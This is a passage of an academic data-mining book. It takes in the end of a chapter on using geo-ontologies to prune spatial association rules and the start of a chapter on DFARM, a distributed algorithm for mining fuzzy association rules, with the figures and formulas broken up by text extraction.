Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
minsup 10%, 15%, and 20%, the elimination of one single dependence pruned the frequent sets around 50%. The elimination of two dependences reduced the number of frequent sets in 75%. The rule reduction is still more significant, as can be observed in Figure 10, reaching around 70% when one dependence is removed and 90% when two dependences are eliminated, independently of minimum support. Algorithms that generate closed frequent sets and eliminate nonredundant rules can reduce still further the number of both frequent sets and association rules if applied to the geographic domain using our method for pruning the input space. Figure 11 shows the result of an experiment where two dependences among relevant feature
types were eliminated during the frequent set generation, but without input pruning. Notice that even using ontologies only in the frequent set generation we get a reduction on the number of frequent sets independently of minimum support. Moreover, the higher the number of dependences, the more significant is the reduction. Figure 12 shows an experiment where dependences were eliminated in both input space (between the target feature and relevant features) and during the frequent set generation (among relevant features). The total number of frequent sets is reduced in more than 50% by removing one single dependence, independently of minimum support. Using ontologies we completely eliminate well known dependences, and very efficiently.
Figure 10. Spatial association rules with input space pruning and 70% minimum confidence Input Pruning (Spatial Association Rules)
Number of Rules
25,000
22,231
Without ontology Removing 1 dependence Removing 2 dependences
20,000 15,000 10,000
7,159
5,000
7,128
2,241
2,252 689
2,268
0 10%
15% MinimumSupport
698 204 20%
Figure 11. Frequent sets generated with frequent set pruning
Number of Frequent Sets
Frequent Set Pruning (Frequent Sets) Without ontologies Removing 1 dependence Removing 2 dependences
2,000 1,731 1,500
1,495 1,137
1,000 651 500
587 459
331 307
239
0 10%
15%
20%
Minimum Support
2421
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Figure 12. Frequent sets generated with input space and frequent set pruning
Frequent Sets
Input Space and Frequent Set Pruning (Frequent Sets) 2,000 1,800 1,600 1,400 1,200 1,000 800 600 400 200 0
Without ontologies
1,731
Removing 1 dependence (input) and 1 dependence (frequent set) 737
651 293
10%
153
15% 20% Minimum Support
FUTURE TRENDS Data mining techniques to extract knowledge from large spatial and nonspatial databases have mainly considered syntactic constraints and the data by itself, without considering semantics. The result is that the same geographic dependences that are well-known by GDB designers and explicitly represented in GDB schemas and geo-ontologies to warrant the consistency of the data, are extracted by data mining algorithms, which should discover only novel and useful patterns. When dealing with geographic data, which are semantically interdependent because of their nature, the meaning of data needs to be considered, at least to avoid the extraction of well known patterns. There is an emerging necessity to consider semantic geographic domain knowledge in spatial data mining. The large amount of knowledge explicitly represented in geographic database schemas and spatio-temporal ontologies needs to be incorporated into data mining techniques, since they provide a valuable source of domain knowledge. How to use this knowledge in data mining systems and for which purposes are still open problems. In this chapter, we presented an efficient solution, addressing a small fraction of these problems. We used geo-ontologies in spatial association rule mining to reduce well-known pat-
2422
331
terns, but the use of ontologies in different data mining techniques such as clustering, classification, and outlier detection are still open problems. In clustering, for example, the use of semantics could either avoid the separation of geographic objects that have mandatory constraints or organize them into the same cluster without the need of computing their relationship. The use of prior knowledge to evaluate the interestingness of patterns extracted with the different data mining techniques still needs to be addressed. The development of toolkits that integrate data mining techniques, geographic databases, and knowledge repositories is another need for practical applications. Although a large number of algorithms has been proposed, their implementation in toolkits with friendly graphical user interfaces that cover the whole KDD process is rare. The gap between data mining techniques and geographic databases is still a problem that makes geographic data preprocessing be the most effort and time consuming step for knowledge discovery in these databases.
CONCLUSION This chapter presented an intelligent framework for geographic data preprocessing and SAR mining using geo-ontologies as prior knowledge. The
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
knowledge refers to mandatory and prohibited semantic geographic constraints, which are explicitly represented in geo-ontologies because they are part of the concepts of geographic data. We showed that explicit mandatory relationships produce irrelevant patterns, and that prohibited relationships do not need to be computed, since they will never hold if the database is consistent. Possible implicit spatial relationships may lead to more interesting patterns and rules, and they can be inferred using geo-ontologies. Experiments showed that independent of the number of elements, one dependence is enough to prune a large number of patterns and rules, and the higher the number of eliminated semantic constraints, the larger is the frequent pattern and rule reduction. We showed that well-known dependences can be partially eliminated with intelligent data preprocessing, independently of the algorithm to be used for frequent pattern mining. To completely eliminate geographic dependences we presented a pruning method that can be applied to any algorithm that generates frequent sets, including closed frequent sets. Algorithms for mining nonredundant association rules can reduce the number of rules further if applied to the geographic domain using our method to generate frequent sets. Considering semantics in geographic data preprocessing and frequent pattern mining has three main advantages: spatial relationships between feature types with dependences are not computed; the number of both frequent sets and association rules is significantly reduced; and the most important, the generated frequent sets and rules are free of associations that are previously known as noninteresting. The main contribution of the method presented in this chapter for mining spatial association rules is for the data mining user, which will analyze much less obvious rules. The method is effective independently of other thresholds, and warrants that geographic domain associations will not appear among the resultant set of rules.
ACKNOWLEDGMENT The authors would like to thank both CAPES and CNPq, which partially provided the financial support for this research. To Procempa, for the geographic database and to Nodo XLDB da Linguateca of Universidade de Lisboa for the geographic ontology. Our special thanks for Mariusa Warpechowski and Daniela Leal Musa for the ontology modeling support, and for Sandro da Silva Camargo for the support with data mining algorithms.
REFERENCES Agrawal, R., Imielinski, T., & Swami, A. (1993). Mining association rules between sets of items in large databases. In P. Buneman & S. Jajodia (Eds.), ACM SIGMOD International Conference on Management of Data (Vol. 20, pp. 207-216). New York: ACM Press. Agrawal, R., & Srikant, R. (1994). Fast algorithms for mining association rules in large databases. In J.B. Bocca, M. Jarke, & C. Zaniolo (Eds.), International Conference on Very Large Databases (Vol. 20, pp. 487-499). San Francisco: Morgan Kaufmann Publishers. Appice, A., Berardi, M., Ceci, M., & Malerba, D. (2005). Mining and filtering multilevel spatial association rules with ARES. In M. Hacid, N. V. Murray, Z. W. Ras, & S. Tsumoto (Eds.), Foundations of Intelligent Systems, 15th International Symposium ISMIS. Vol. 3488 (pp. 342-353). Berlin: Springer. Bogorny, V., & Iochpe, C. (2001). Extending the opengis model to support topological integrity constraints. In M. Mattoso & G. Xexéo (Eds.), 16th Brazilian Symposium in Databases (pp. 2539). Rio de Janeiro: COPPE/UFRJ. Bogorny, V., Engel, P. M., & Alvares, L.O. (2005a). A reuse-based spatial data preparation framework
2423
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
for data mining. In J. Debenham & K. Zhang (Eds.), 15th International Conference on Software Engineering and Knowledge Engineering (pp. 649-652). Taipei: Knowledge Systems Institute. Bogorny, V., Engel, P. M., & Alvares, L.O. (2005b). Towards the reduction of spatial join for knowledge discovery in geographic databases using geo-ontologies and spatial integrity constraints. In M. Ackermann, B. Berendt, M. Grobelink, & V. Avatek (Eds.), ECML/PKDD 2nd Workshop on Knowledge Discovery and Ontologies (pp. 51-58). Porto. Bogorny, V., Engel, P. M., & Alvares, L.O. (2006a). GeoARM: An interoperable framework to improve geographic data preprocessing and spatial association rule mining. In Proceedings of the 18th International Conference on Software Engineering and Knowledge Engineering (pp. 70-84). San Francisco: Knowledge Systems Institute. Bogorny, V., Camargo, S., Engel, P., M., & Alvares, L.O. (2006b). Towards elimination of well known geographic domain patterns in spatial association rule mining. In Proceedings of the 3rd IEEE International Conference on Intelligent Systems (pp. 532-537). London: IEEE Computer Society. Bogorny, V., Camargo, S., Engel, P., & Alvares, L. O. (2006c). Mining frequent geographic patterns with knowledge constraints. In 14th ACM International Symposium on Advances in Geographic Information Systems. Arlington, November (to appear). Chaves, M. S., Silva, M. J., & Martins, B. (2005a). A geographic knowledge base for semantic web applications. In C. A. Heuser (Ed.), 20th Brazilian Symposium on Databases (pp. 40-54). Uberlandia: UFU. Chaves, M. S., Silva, M. J., & Martins, B. (2005b). GKB—Geographic Knowledge Base. (TR05-12). DI/FCUL.
2424
Clementini, E., Di Felice, P., & Van Ostern, P. (1993). A small set of formal topological relationships for end-user interaction. In D.J. Abel & B.C. Ooi (Eds.), Advances in Spatial Databases, 3rd International Symposium, 692 (pp. 277-295). Singapore: Springer. Cockcroft, S. (1997). A Taxonomy of spatial data integrity constraints. Geoinformatica, 1(4), 327-343. Clementini, E., Felice, Di, P., & Koperski, K. (2000). Mining multiple-level spatial association rules for objects with a broad boundary. Data & Knowledge Engineering, 34(3), 251-270. Egenhofer, M., & Franzosa, R. (1995). On the equivalence of topological relations. International Journal of Geographical Information Systems, 9(2), 133-152. Ester, M., Frommelt, A., Kriegel, H.-P., & Sander, J. (2000). Spatial data mining: Database primitives, algorithms and efficient DBMS support. Journal of Data Mining and Knowledge Discovery, 4(2-3), 193-216. Fayyad, U., Piatetsky-Shapiro, G., & Smyth, P. (1996). From data mining to discovery knowledge in databases. AI Magazine, 3(17), 37-54. Gruber, T. R. (1993). Towards principles for the design of ontologies used for knowledge sharing. Formal ontology in conceptual analysis and knowledge representation. International Journal of Human-Computer Studies, 43, 907-928. Guarino, N. (1998). Formal ontology and information systems. In N. Guarino (Ed.), International Conference on Formal Ontology in Information Systems (pp. 3-15). Trento: IOS Press. Han, J., & Fu, Y. (1995). Discovery of multiplelevel association rules from large databases. In U. Dayal, P.M.D. Gray, & S. Nishio (Eds.), International Conference on Very Large Data Bases (pp. 420-431). Zurich: Morgan-Kaufmann.
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
Han, J., Koperski, K., & Stefanvic, N. (1997). GeoMiner: a system prototype for spatial data mining. In J. Peckham (Ed.), ACMSIGMOD International Conference on Management of Data, 26 (pp. 553-556). Tucson: ACM Press. Han, J., Pei J., & Yin, Y. (2000). Mining frequent patterns without candidate generation. In J.Chen, F. Naughton, & P.A. Bernstein (Eds.), 20th ACMSIGMOD International Conference on Management of Data (pp. 1-12) Dallas: ACM. Huang, Y., Shekhar, S., & Xiong, H. (2004). Discovering co-location patterns from spatial datasets: A general approach. IEEE Transactions on Knowledge and Data Engineering, 16(12), 1472-1485. Koperski, K., & Han, J. (1995). Discovery of spatial association rules in geographic information databases. In M.J. Egenhofer, J.R. Herring (Eds.), 4th International Symposium on Large Geographical Databases, 951 (pp. 47-66). Portland: Springer. Lu, W., Han, J., & Ooi, B. C. (1993). Discovery of general knowledge in large spatial databases. In Far East Workshop on Geographic Information Systems (pp. 275-289). Singapore. Open Gis Consortium. (1999a). Topic 5, the OpenGIS abstract specification—OpenGIS features—Version 4. Retrieved August 20, 2005, from http://www.OpenGIS.org/techno/specs.htm Open Gis Consortium. (1999b). Open GIS Simple Features Specification For SQL. Retrieved August 20, 2005, from http://www.opengeospatial. org/specs Open Gis Consortium. (2001). Feature Geometry. Retrieved August 20, 2005, from http://www. opengeospatial.org/specs Pasquier, N., Bastide, Y., Taouil, R., & Lakhal, L. (1999). In C. Beeri & P. Buneman (Eds.), 7th International Conference on Database Theory, 1540 (pp. 398-416). Jerusalem: Springer.
Servigne, S., Ubeda, T., Puricelli, A., & Laurini, R. (2000). A methodology for spatial consistency improvement of geographic databases. Geoinformatica, 4(1), 7-34. Shekhar, S., & Chawla, S. (2003). Spatial databases: a tour. Upper Saddle, NJ: Prentice Hall. Srikant, R. & Agrawal, R. (1995). Mining generalized association rules. In U. Dayal, P. M. D. Gray, S. Nishio (Eds.), Proceedings of the 21st International Conference on Very Large Databases (pp. 407-419). Zurich: Morgan Kaufmann. Yoo, J. S., & Shekhar, S. (2006). A join-less approach for mining spatial co-location patterns. IEEE Transactions on Knowledge and Data Engineering, 18(10). Zaki. M. (2000). Generating nonredundant association rules. In S.J. Simoff & O. R. Zaïane (Eds.), Proceedings of the 6th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining (pp. 34-43) Boston: ACM Press. Zaki., M., & Hsiao, C. (2002). CHARM: An efficient algorithm for closed itemset mining. In R.L. Grossman, J. Han, V. Kumar, H. Mannila, & R. Motwani (Eds.), Proceeding of the 2nd SIAM International Conference on Data Mining (pp. 457-473). Arlington: SIAM.
ADDITIONAL READING Bernstein, A., Provost, Foster J., & Hill, S. (2005). Toward intelligent assistance for a data mining process: An ontology-based approach for cost-sensitive classification. IEEE Transactions on Knowledge and. Data Engineering, 17(4), 503-518. Bogorny, V., Valiati, J.F., Camargo, S.S., Engel, P.M., Kuijpers, B., & Alvares, L.O. (2006). Mining maximal generalized frequent geographic patterns with knowledge constraints. Sixth IEEE Interna-
2425
Enhancing the Process of Knowledge Discovery in Geographic Databases Using Geo-Ontologies
tional Conference on Data Mining (pp. 813-817). Hong Kong: IEEE Computer Society. Bogorny, V. (2006). Enhancing spatial association rule mining in geographic databases. PhD Thesis. Porto Alegre, Brazil: Instituto de Informatica—UFRGS. Chen, X., Zhou, X., Scherl, R.B., & Geller, J. (2003). Using an interest ontology for improved support in rule mining. In Y. Kambayashi, M. K. Mohania, & W. Wolfram (Eds), Fifth International Conference on Data WareHouse and Knowledge Discovery (pp. 320-329). Prague: Springer. Farzanyar, Z., Kangavari, M., & Hashemi, S. (2006). A new algorithm for mining fuzzy association rules in the large databases based on ontology. Workshops Proceedings of the 6th IEEE International Conference on Data Mining (pp. 65-69). Hong Kong: IEEE Computer Society. Jozefowska, J., Lawrynowicz, A., & Lukaszewski, T. (2006). Frequent pattern discovery from OWL DLP knowledge bases. In S. Staab & V. Sv (Eds). International Conference on Managing Knowledge in a World of Networks (pp. 287-302). Czech Republic: Springer.
Knowledge Discovery and Ontologies. (2004). ECML/PKDD Workshop. Retrieved February 12, 2006, from http://olp.dfki.de/pkdd04/cfp.htm Knowledge Discovery and Ontologies. (2005). ECML/PKDD Workshop. Retrieved February 12, 2006, from http://webhosting.vse.cz/svatek/ KDO05 Mennis, J., & Peuquet, D.J. (2003). The role of knowledge representation in geographic knowledge discovery: A case study. Transactions in GIS, 7(3), 371-391. Singh, P., & Lee, Y. (2003). Context-based data mining using ontologies. In I. Song, S.W. Liddle, T. Wang Ling, & P. Scheuermann (Eds.), International Conference on Conceptual Modeling (pp. 405-418). Chicago: Springer. Xu, W., & Huang, H. (2006). Research and application of spatio-temporal data mining based on ontology. First International Conference on Innovative Computing, Infroamtion and Control, (pp. 535-538). Los Alamitos: IEEE Computer Society. Yu, S., Aufaure, M. Cullot, N., & Spaccapietra, S. (2003). Location-based spatial modelling using ontology. Sixth AGILE Conference on Geographic Information Science. Lyon, France.
This work was previously published in Data Mining with Ontologies: Implementations, Findings, and Frameworks, edited by H. Nigro, S. Cisaro, and D. Xodo, pp. 160-181, copyright 2008 by Information Science Reference (an imprint of IGI Global).
2426
2427
Chapter 8.4
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases Wai-Ho Au Microsoft Corporation, USA
ABSTRACT The mining of fuzzy association rules has been proposed in the literature recently. Many of the ensuing algorithms are developed to make use of only a single processor or machine. They can be further enhanced by taking advantage of the scalability of parallel or distributed computer systems. The increasing ability to collect data and the resulting huge data volume make the exploitation of parallel or distributed systems become more and more important to the success of fuzzy association rule mining algorithms. This chapter proposes a new distributed algorithm, called DFARM, for mining fuzzy association rules from very large databases. Unlike many existing algorithms that adopt the support-confidence framework such that an association is considered interesting if it satisfies some user-specified minimum percentage thresholds, DFARM embraces an objective measure to distinguish interesting associations from uninteresting ones. This measure is defined as a function of the
difference in the actual and the expected number of tuples characterized by different linguistic variables (attributes) and linguistic terms (attribute values). Given a database, DFARM first divides it into several horizontal partitions and assigns them to different sites in a distributed system. It then has each site scan its own database partition to obtain the number of tuples characterized by different linguistic variables and linguistic terms (i.e., the local counts), and exchange the local counts with all the other sites to find the global counts. Based on the global counts, the values of the interestingness measure are computed, and the sites can uncover interesting associations. By repeating this process of counting, exchanging counts, and calculating the interestingness measure, it unveils the underlying interesting associations hidden in the data. We implemented DFARM in a distributed system and used a popular benchmark data set to evaluate its performance. The results show that it has very good size-up, speedup, and scale-up performance. We also evaluated the effectiveness
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
of the proposed interestingness measure on two synthetic data sets. The experimental results show that it is very effective in differentiating between interesting and uninteresting associations.
INTRODUCTION Of the many different kinds of patterns that can be discovered in a database, the mining of association rules has been studied extensively in the literature (see, e.g., J. Han & Kamber, 2001; Hand, Mannila, & Smyth, 2001). It is because the uncovering of the underlying association relationships (or simply associations) hidden in the data can enable other important problems, such as classification (Au & Chan, 2001; Liu, Hsu, & Ma, 1998), to be tackled more effectively. The problem of discovering interesting associations in databases is originally defined over binary or Boolean data (Agrawal, Imielinski, & Swami, 1993). It is then extended to cover many real-life databases comprising both discrete- and continuous-valued data (Srikant & Agrawal, 1996). An association that is considered interesting is typically expressed in the form of rule X → Y, where X and Y are conjunctions of conditions. A condition is either Ai = ai, where ai is a value in the domain of attribute Ai if Ai is discrete, or ai ∈ [li, ui], where li and ui are values in the domain of attribute Ai if Ai is continuous. The association rule X → Y holds with support, which is defined as the percentage of tuples satisfying X and Y, and confidence, which is defined as the percentage of tuples satisfying Y given that they also satisfy X. An example of an association rule is Gender = Female ∧ Age ∈ [20, 25] ∧ Income ∈ [15 000, 20 000] → Occupation = Cashier, which describes that a woman whose age is between 20 and 25 and whose income is between $15,000 and $20,000 is likely a cashier. To handle continuous attributes, many data
2428
mining algorithms (e.g., Liu et al., 1998; Srikant & Agrawal, 1996) require their domains to be discretized into a finite number of intervals. These intervals may not be concise and meaningful enough for human experts to obtain comprehensive knowledge from the discovered association rules. Instead of using intervals, many researchers propose to employ fuzzy sets to represent the underlying relationships hidden in the data (Au & Chan, 2001, 2003; Carrasco, Vila, Galindo, & Cubero, 2000; Chan & Au, 1997, 2001; Delgado, Marín, Sánchez, & Vila, 2003; Hirota & Pedrycz, 1999; Hong, Kuo, & Chi, 1999; Kuok, Fu, & Wong, 1998; Maimon, Kandel, & Last, 1999; Yager, 1991; Zhang, 1999). The association rules involving fuzzy sets are commonly known as fuzzy association rules. An example of a fuzzy association rule is given in the following: Gender = Female ∧ Age = Young ∧ Income = Small → Occupation = Cashier, where Gender, Age, Income, and Occupation are linguistic variables, and Female, Young, Small, and Cashier are linguistic terms. This rule states that a young woman whose income is small is likely a cashier. In comparison to its counterpart involving discretized intervals, it is easier for human users to understand. The use of fuzzy sets also buries the boundaries of the adjacent intervals. This makes fuzzy association rules resilient to the inherent noise present in the data, for instance, the inaccuracy in physical measurements of real-world entities. Many of the ensuing algorithms, including those in (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001; Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999), are developed to make use of only a single processor or machine. They can be further enhanced by taking advantage of the scalability of parallel or distributed computer systems. Because of the increasing ability to collect data and the resulting huge data volume, the exploitation of
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
parallel or distributed systems become more and more important to the success of fuzzy association rule mining algorithms. Regardless of whether an algorithm is developed to discover (crisp) association rules (e.g., (Agrawal et al., 1993; Agrawal & Shafer, 1996; Agrawal & Srikant, 1994; Cheung et al., 1996; E.-H. Han, Karypis, & Kumar, 1997; Mannila, Toivonen, & Verkamo 1994; Park, Chen & Yu, 1995a, 1995b; Savasere, Omiecinski, & Navathe, 1995; Shintani & Kitsuregawa, 1996; Srikant & Agrawal, 1996) or fuzzy association rules (e.g., Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999), it quintessentially employs the support-confidence framework to mine interesting associations from databases. Based on this framework, an association is considered interesting if it satisfies the minimum support and the minimum confidence threshold supplied by a user. While these algorithms can be effective in many tasks, what the thresholds should be are often difficult to decide. If the thresholds are not set properly, the discovered association rules can be quite misleading (J. Han & Kamber, 2001; Hand et al., 2001). For an algorithm to reveal association rules more effectively, an objective interestingness measure that does not require a lot of trial-and-error efforts by the user is necessary. In this chapter, we propose a new algorithm, called distributed fuzzy association rule mining (DFARM), for mining fuzzy association rules from very large databases in a distributed environment. It embraces an objective interestingness measure, called adjusted residual (Haberman, 1973). Based on the concept of statistical residual analysis, it is defined as a function of the difference of the actual and the expected number of tuples characterized by different attributes and attribute values. We show how to apply this measure to fuzzy data here. By virtue of this measure, DFARM is able to differentiate between interesting and uninteresting associations without having a user supply any thresholds. To our best knowledge, DFARM is the first distributed algorithm that utilizes an objective measure for mining interesting associa-
tions from fuzzy data without any user-specified thresholds. DFARM begins by dividing a database into several horizontal partitions and assigning them to different sites in a distributed system. It then has each site scan its own database partition to obtain the number of tuples characterized by different linguistic variables and linguistic terms (i.e., the local counts), and exchanges the local counts with all the other sites to find the global counts. Based on the global counts, the adjusted residuals are computed and the sites can reveal interesting associations. By repeating this process of counting, exchanging counts, and calculating the adjusted residuals, DFARM unveils the underlying interesting associations hidden in the data. We made use of two synthetic data sets to evaluate the effectiveness of the interestingness measure in discriminating interesting associations from uninteresting ones. We also implemented DFARM in a distributed system using the parallel virtual machine (PVM; Geist, Beguelin, Dongarra, Jiang, Manchek, & Sunderam, 1994), and used a popular benchmark data set to evaluate its performance. The results show that DFARM has very good size-up, speedup, and scale-up performance.
RELATED WORK The mining of association rules based on the support-confidence framework is defined as follows (Agrawal et al., 1993). Let I = {i1, …, im} be a set of binary attributes, called items, and T be a set of transactions. Each transaction t ∈ T is represented as a binary vector with t[k] = 1 if t contains item ik, otherwise t[k] = 0 for k = 1, …, m. A set of items is known as an item set. A k-item set is an item set consisting of k items. The support of an item set, X ⊂ I, is defined as the percentage of tuples containing X. The item set is frequent if its support is greater than or equal to the user-specified minimum support. An association rule is defined as an implication of the form X → Y, where X ⊂ I,
2429
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
Y ⊂ I and X ∩ Y = ∅. The rule X → Y holds in T with support, which is defined as the percentage of tuples containing X and Y, and confidence, which is defined as the percentage of tuples containing Y given that they also contain X. An association rule is interesting if its support and confidence are greater than or equal to the user-supplied minimum support and minimum confidence, respectively. Since they are defined over binary data, they are usually referred to as Boolean association rules. The ensuing algorithms first find all frequent item sets in a database and then generate association rules from these frequent item sets. Since the former step consumes most of the computational resources, current research primarily focuses on speeding up the process of discovering frequent item sets (Agrawal et al., 1993; Agrawal & Srikant, 1994; Mannila et al., 1994; Park et al., 1995a; Savasere et al., 1995). Apriori (Agrawal & Srikant, 1994) is a wellknown algorithm for mining Boolean association rules. First of all, it generates a set of candidate 1-item sets, C1. It then scans all the transactions to obtain the support counts of the item sets in C1. The item sets whose supports satisfy the minimum support become frequent 1-item sets, F1. After that, Apriori generates a set of candidate 2-item sets, C2, from F1. It then examines the item sets in C2. If any subset of an item set in C2 is not in F1, it eliminates the item set from C2. It subsequently scans all the transactions to find the support counts of the item sets in C2. The item sets whose supports satisfy the minimum support become frequent 2item sets, F2. Apriori then continues to generate candidates and find frequent 3-item sets and so forth until no frequent item sets or candidate item sets are found. Different techniques, including those in Park et al. (1995a) and Savasere et al. (1995), have been proposed to improve the efficiency of the algorithm. Unlike Apriori and its variants, a method called FP-growth (J. Han, Pei, & Yin, 2000) is proposed to mine frequent item sets without candidate generation. It first compresses the database into an FP-tree,
2430
but retains the item set association information at the same time. It then divides the FP-tree into a set of conditional databases, each of which is associated with one frequent item, and it mines each such database separately. The FP-growth method transforms the problem of finding long frequent item sets to looking for shorter ones recursively and then concatenating the suffix (J. Han et al.). It is shown in J. Han et al. that this method is about an order of magnitude faster than Apriori. In order to handle very large databases, the serial approaches to mining Boolean association rules (e.g., Agrawal et al., 1993; Agrawal & Srikant, 1994; Mannila et al., 1994; Park et al., 1995a; Savasere et al., 1995) have been extended to take advantage of the scalability of parallel or distributed systems. Three algorithms, namely, count distribution, data distribution, and candidate distribution, which adopt Apriori in the distributed-memory architecture, are proposed in Agrawal and Shafer (1996). These algorithms divide a database into several horizontal partitions and assign them to different processors. In count distribution, every processor runs Apriori over its database partition with a modification in which it (a) exchanges the local support counts of candidate item sets in its database partition with all the other processors to find the global support counts in the entire database and (b) identifies frequent item sets based on the global support counts at each of the iterations. Data distribution partitions candidate item sets and assigns them to different processors in a round-robin fashion. At each of the iterations, every processor broadcasts its database partition to all the other processors to find the global support counts of its candidate item sets. Candidate distribution starts the data mining process by utilizing either count distribution or data distribution. At certain iterations, it divides the candidate item sets into several disjoint subsets and assigns different subsets to different processors. At the same time, the database is repartitioned in such a way that each
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
processor can find the (global) support counts of its candidate item sets in its database partition independent of other processors. To achieve this, parts of the database may be replicated on several processors. Each processor then generates candidate item sets and counts the supports of these candidate item sets independently at subsequent iterations. In addition to these three algorithms, other parallel algorithms based on Apriori are also proposed in the literature (Cheung et al., 1996a; E. H. Han et al., 1997; Park et al., 1995b; Shintani & Kitsuregawa, 1996). Regardless of whether an algorithm is serial or parallel, it determines if an association is interesting by means of the userspecified minimum support and minimum confidence thresholds. A weakness is that many users do not have any idea what the thresholds should be. If they are set too high, a user may miss some useful rules; if they are set too low, the user may be overwhelmed by many irrelevant ones (J. Han & Kamber, 2001; Hand et al., 2001). The techniques for mining Boolean association rules are extended to take discrete- and continuousvalued data into consideration. Association rules involving discrete and continuous attributes are known as quantitative association rules (Srikant & Agrawal, 1996). To handle continuous attributes, their domains are discretized into a finite number of intervals. The discretization can be performed as a part of the algorithms (e.g., Srikant & Agrawal) or as a preprocessing step before data mining (e.g., Liu et al., 1998). Both discrete and continuous attributes are handled in a uniform fashion as a set of pairs by mapping the values of discrete attributes to a set of consecutive integers and by mapping the discretized intervals of continuous attributes to consecutive integers, which preserve the order of the intervals (Srikant & Agrawal). Instead of having just one field for each attribute, it needs to use as many fields as the number of different attribute values. For example, the value of a Boolean field
corresponding to would be 1 if attribute1 has value1 in the original record, and 0 otherwise (Srikant & Agrawal). After the mappings, both the serial and parallel algorithms for mining Boolean association rules, such as those in Agrawal et al. (1993), Agrawal and Shafer (1996), Agrawal and Srikant, Cheung et al. (1996), H. H. Han et al. (1997), J. Han et al. (2000), Mannila et al. (1994), Park et al. (1995a, 1995b), Savasere et al. (1995), and Shintani and Kitsuregawa (1996), can be applied to the encoded data. Regardless of how the domains of continuous attributes are discretized, the intervals may not be concise and meaningful enough for human users to easily obtain nontrivial knowledge from the discovered patterns. To better handle continuous data, the use of fuzzy sets in the mining of association rules has recently been proposed in the literature (Au & Chan, 2001, 2003; Chan & Au, 1997, 2001; Delgado et al., 2003; Hong et al., 1999; Kuok et al., 1998; Zhang, 1999). These algorithms typically use a fuzzy partitioning methodology to generate fuzzy sets representing the domain of each continuous attribute as a preprocessing step. The fuzzy sets can be supplied by domain experts or generated automatically from the data by fuzzy partitioning approaches, such as in Au, Chan, and Wong (2006). For algorithms, such as in Delgado et al. (2003), Hong et al. (1999), Kuok et al. (1998), and Zhang (1999), to mine interesting associations from the fuzzified data, they adopt the support-confidence framework. Similar to their contemporary algorithms for mining (crisp) association rules, they encounter the same problem regarding how it is usually difficult to determine which values the user-specified minimum support and minimum confidence ought to be. Some meaningful relationships may not be found if they are set too high, whereas some misleading relationships may be revealed if they are set too low (J. Han & Kamber, 2001; Hand et al., 2001).
2431
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
is one of the linguistic terms in T(Li) = {lij | j = 1, …, mi}, where lij is a linguistic term characterized by a fuzzy set Fij such that
IDENTIFYING INTERESTING ASSOCIATIONS In the following subsections, we present (a) the definition of linguistic variables and linguistic terms, (b) an objective measure for identifying interesting associations between different linguistic terms, and (c) the formation of fuzzy rules to represent the interesting associations and how to represent the uncertainty associated with the rules.
Linguistic Variables and Linguistic Terms Given a database relation D, each tuple t in D is composed of a set of attributes A = {A1, …, An}, where A1, …, An can be continuous or discrete. For any tuple, t ∈ D, t[Ai] denotes the value ai in t for attribute Ai. Let L = {L1, …, Ln} be a set of linguistic variables such that Li represents Ai. For any continuous attribute Ai, let dom(Ai) = [li, ui] ⊆ ℜ denote the domain of the attribute. Ai is represented by a linguistic variable Li whose value is one of the linguistic terms in T(Li) = {lij | j = 1, …, si}, where si denotes the number of linguistic terms and lij is a linguistic term characterized by a fuzzy set Fij that is defined on dom(Ai) and whose membership function is Fij such that Fij
: dom( Ai ) → [0, 1].
(1)
The fuzzy sets Fij, j = 1, …, si are represented by
Fij = ∫
dom ( Ai )
Fij
(ai )
,
(2)
ai
where ai ∈ dom(Ai). Fo r a ny d i s c r e t e a t t r i b u t e A i , le t dom( Ai ) = {a i1 , ..., a im i } denote the domain of Ai. Ai is represented by linguistic variable Li whose value
2432
Fij = ∑dom ( A ) i
Fij
(ai )
,
(3)
ai
where ai ∈ dom(Ai). Regardless of whether Ai is discrete or continuous, the degree of compatibility of ai ∈ dom(Ai) with linguistic term lij is given by Fij ( a i ). In addition to handling discrete and continuous attributes in a uniform fashion, the use of linguistic variables to represent discrete attributes allows the fuzzy nature of real-world entities to be easily captured. For example, it may be difficult to discriminate the color orange from the color red. It is for this reason that an object, which is orange in color, may be perceived as red in color to a certain extent. Such kinds of fuzziness in linguistic variable Color can be represented by linguistic terms Red and Orange. Based on these linguistic terms, the color of an object can be compatible with the term Red to a degree of 0.7 and with the term Orange to a degree of 0.3. Interested readers are referred to Mendel (1995) and Yen and Langari (1999) for the details of linguistic variables, linguistic terms, fuzzy sets, and membership functions. Using the above technique, the original attributes in A = {Ai | i = 1, …, n} are represented by the linguistic variables in L = {Li | i = 1, …, n}. These linguistic variables are associated with a set of linguistic terms, l = {lij | i = 1, …, n, j = 1, …, si}. These linguistic terms are, in turn, characterized by a set of fuzzy sets, F = {Fij | i = 1, …, n, j = 1, …, si}. Given a tuple t ∈ D and a linguistic term lij ∈ l, which is characterized by a fuzzy set Fij ∈ F, the degree of membership of the values in t with respect to Fij is given by Fij (t[ Ai ]). The degree to which t is characterized by lij, lij (t ), is defined as
A Distributed Algorithm for Mining Fuzzy Association Rules in Traditional Databases
lij
(t ) =
Fij
(t[ Ai ]).
(4)
